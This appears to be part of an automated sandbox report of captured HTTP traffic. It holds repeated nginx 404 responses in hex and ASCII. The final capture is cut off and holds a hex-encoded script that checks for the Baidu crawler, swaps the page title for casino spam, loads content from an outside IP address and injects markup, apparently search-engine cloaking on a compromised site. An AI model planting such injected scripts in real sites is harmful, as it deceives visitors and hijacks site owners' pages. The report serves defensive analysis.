Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:25:48 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:25:51 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:25:53 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:25:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingSet-Cookie: xx=xx; expires=Mon, 28-Nov-2022 09:35:59 GMT; Max-Age=600Content-Encoding: gzipData Raw: 31 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 91 cd 4a c3 40 10 c7 cf 2d f4 1d d2 78 ed 92 96 04 91 98 14 44 3c f8 00 82 d7 6d 76 9a 2c 6e 76 63 32 e9 87 e2 a5 08 5e f4 2a 22 3e 40 2f 22 5e 54 d0 c7 69 ab 37 5f c1 cd f6 cb c3 32 3b ff 99 df ce cc 4e d0 64 2a c2 71 06 56 82 a9 e8 36 ea c1 c6 02 65 95 9f 02 52 2b 4a 68 5e 00 86 76 89 7d b2 67 6f f4 04 31 23 70 5e f2 41 68 9f 92 93 03 72 a8 d2 8c 22 ef 09 b0 ad 48 49 04 a9 a1 e3 a3 10 58 0c 5b 4c d2 14 42 7b c0 61 98 a9 1c ff 65 0e 39 c3 24 64 30 e0 11 10 e3 b4 2c 2e 39 72 2a 48 11 51 01 61 a7 65 a5 74 c4 d3 32 dd 0a 65 01 b9 f1 a8 ae 1b 4a 65 0a 21 47 01 5d af ed 05 ce f2 aa b5 02 c7 5a 6b d4 6b 3d c5 c6 97 da d6 7a 34 3a 8b 73 55 4a 46 22 25 54 ee ef 78 9e b7 5f 45 fa ba 7b 52 f0 0b f0 3b 5e 36 aa a4 2b 7d 12 d7 60 db e0 6e 7b 19 ac ad 70 00 30 38 c2 08 09 15 3c 96 7e a4 3f 01 72 a3 66 94 31 2e 63 82 2a f3 dd 35 69 1e 1b 02 8f 13 f4 a5 ca 53 2a 56 d5 02 67 dd 70 e0 24 cb 75 e8 21 aa de cd a2 dc 6a ba df af db c5 64 fa f3 f2 be 78 9d 7c 3f 5e 2f ee 6f 66 9f 6f b3 8f bb f9 f3 c3 fc 69 da d4 a0 5b 25 3b 6b ca 31 fb fd 03 3d d4 81 67 f7 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 16dMJ@-xD<mv,nvc2^*">@/"^Ti7_2;Nd*qV6eR+Jh^v}go1#p^Ahr"HIX[LB{ae9$d0,.9r*HQaet2eJe!G]Zkk=z4:sUJF"%Tx_E{R;^6+}`n{p08<~?rf1.c*5iS*Vgp$u!jdx|?^/ofoi[%;k1=g0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:26:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingSet-Cookie: xx=xx; expires=Mon, 28-Nov-2022 09:36:01 GMT; Max-Age=600Content-Encoding: gzipData Raw: 31 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 91 cd 4a c3 40 10 c7 cf 2d f4 1d d2 78 ed 92 96 04 91 98 14 44 3c f8 00 82 d7 6d 76 9a 2c 6e 76 63 32 e9 87 e2 a5 08 5e f4 2a 22 3e 40 2f 22 5e 54 d0 c7 69 ab 37 5f c1 cd f6 cb c3 32 3b ff 99 df ce cc 4e d0 64 2a c2 71 06 56 82 a9 e8 36 ea c1 c6 02 65 95 9f 02 52 2b 4a 68 5e 00 86 76 89 7d b2 67 6f f4 04 31 23 70 5e f2 41 68 9f 92 93 03 72 a8 d2 8c 22 ef 09 b0 ad 48 49 04 a9 a1 e3 a3 10 58 0c 5b 4c d2 14 42 7b c0 61 98 a9 1c ff 65 0e 39 c3 24 64 30 e0 11 10 e3 b4 2c 2e 39 72 2a 48 11 51 01 61 a7 65 a5 74 c4 d3 32 dd 0a 65 01 b9 f1 a8 ae 1b 4a 65 0a 21 47 01 5d af ed 05 ce f2 aa b5 02 c7 5a 6b d4 6b 3d c5 c6 97 da d6 7a 34 3a 8b 73 55 4a 46 22 25 54 ee ef 78 9e b7 5f 45 fa ba 7b 52 f0 0b f0 3b 5e 36 aa a4 2b 7d 12 d7 60 db e0 6e 7b 19 ac ad 70 00 30 38 c2 08 09 15 3c 96 7e a4 3f 01 72 a3 66 94 31 2e 63 82 2a f3 dd 35 69 1e 1b 02 8f 13 f4 a5 ca 53 2a 56 d5 02 67 dd 70 e0 24 cb 75 e8 21 aa de cd a2 dc 6a ba df af db c5 64 fa f3 f2 be 78 9d 7c 3f 5e 2f ee 6f 66 9f 6f b3 8f bb f9 f3 c3 fc 69 da d4 a0 5b 25 3b 6b ca 31 fb fd 03 3d d4 81 67 f7 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 16dMJ@-xD<mv,nvc2^*">@/"^Ti7_2;Nd*qV6eR+Jh^v}go1#p^Ahr"HIX[LB{ae9$d0,.9r*HQaet2eJe!G]Zkk=z4:sUJF"%Tx_E{R;^6+}`n{p08<~?rf1.c*5iS*Vgp$u!jdx|?^/ofoi[%;k1=g0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:26:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingSet-Cookie: xx=xx; expires=Mon, 28-Nov-2022 09:36:03 GMT; Max-Age=600Content-Encoding: gzipData Raw: 31 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 91 cd 4a c3 40 10 c7 cf 2d f4 1d d2 78 ed 92 96 04 91 98 14 44 3c f8 00 82 d7 6d 76 9a 2c 6e 76 63 32 e9 87 e2 a5 08 5e f4 2a 22 3e 40 2f 22 5e 54 d0 c7 69 ab 37 5f c1 cd f6 cb c3 32 3b ff 99 df ce cc 4e d0 64 2a c2 71 06 56 82 a9 e8 36 ea c1 c6 02 65 95 9f 02 52 2b 4a 68 5e 00 86 76 89 7d b2 67 6f f4 04 31 23 70 5e f2 41 68 9f 92 93 03 72 a8 d2 8c 22 ef 09 b0 ad 48 49 04 a9 a1 e3 a3 10 58 0c 5b 4c d2 14 42 7b c0 61 98 a9 1c ff 65 0e 39 c3 24 64 30 e0 11 10 e3 b4 2c 2e 39 72 2a 48 11 51 01 61 a7 65 a5 74 c4 d3 32 dd 0a 65 01 b9 f1 a8 ae 1b 4a 65 0a 21 47 01 5d af ed 05 ce f2 aa b5 02 c7 5a 6b d4 6b 3d c5 c6 97 da d6 7a 34 3a 8b 73 55 4a 46 22 25 54 ee ef 78 9e b7 5f 45 fa ba 7b 52 f0 0b f0 3b 5e 36 aa a4 2b 7d 12 d7 60 db e0 6e 7b 19 ac ad 70 00 30 38 c2 08 09 15 3c 96 7e a4 3f 01 72 a3 66 94 31 2e 63 82 2a f3 dd 35 69 1e 1b 02 8f 13 f4 a5 ca 53 2a 56 d5 02 67 dd 70 e0 24 cb 75 e8 21 aa de cd a2 dc 6a ba df af db c5 64 fa f3 f2 be 78 9d 7c 3f 5e 2f ee 6f 66 9f 6f b3 8f bb f9 f3 c3 fc 69 da d4 a0 5b 25 3b 6b ca 31 fb fd 03 3d d4 81 67 f7 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 16dMJ@-xD<mv,nvc2^*">@/"^Ti7_2;Nd*qV6eR+Jh^v}go1#p^Ahr"HIX[LB{ae9$d0,.9r*HQaet2eJe!G]Zkk=z4:sUJF"%Tx_E{R;^6+}`n{p08<~?rf1.c*5iS*Vgp$u!jdx|?^/ofoi[%;k1=g0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:26:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingSet-Cookie: xx=xx; expires=Mon, 28-Nov-2022 09:36:05 GMT; Max-Age=600Data Raw: 31 66 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 09 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1f7<!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:26:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"634bbb43-6cd"Content-Encoding: gzipData Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:26:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"634bbb43-6cd"Content-Encoding: gzipData Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:26:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"634bbb43-6cd"Content-Encoding: gzipData Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:26:29 GMTContent-Type: text/htmlContent-Length: 1741Connection: closeVary: Accept-EncodingETag: "634bbb43-6cd"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 3e 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 63 61 6c 65 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 62 61 69 64 75 22 29 20 3d 3d 20 2d 31 29 7b 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 20 3d 22 e6 be b3 e9 97 a8 e9 93 b6 e6 b2 b3 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 34 35 2e 31 32 32 2e 31 33 38 2e 34 35 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 6c 6e 28 27 27 29 3b 76 61 72 20 73 73 3d 27 3c 64 69 76 20 69 64 3d 22 73 68 6f 77 63 6c 6f 6e 65 73 68 65 6e 67 78 69 61 6f 